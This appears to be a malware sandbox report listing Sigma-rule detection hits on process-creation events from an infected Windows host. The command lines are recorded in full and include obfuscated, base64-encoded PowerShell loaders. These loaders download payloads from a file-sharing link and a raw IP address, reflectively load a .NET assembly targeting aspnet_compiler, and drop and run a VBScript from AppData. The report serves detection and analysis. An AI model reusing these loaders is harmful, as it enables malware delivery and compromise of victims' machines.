                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 6964, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", CommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0c
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, ProcessId: 6036, ProcessName: powershell.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 6964, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3636, ProcessName: aspnet_compiler.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5k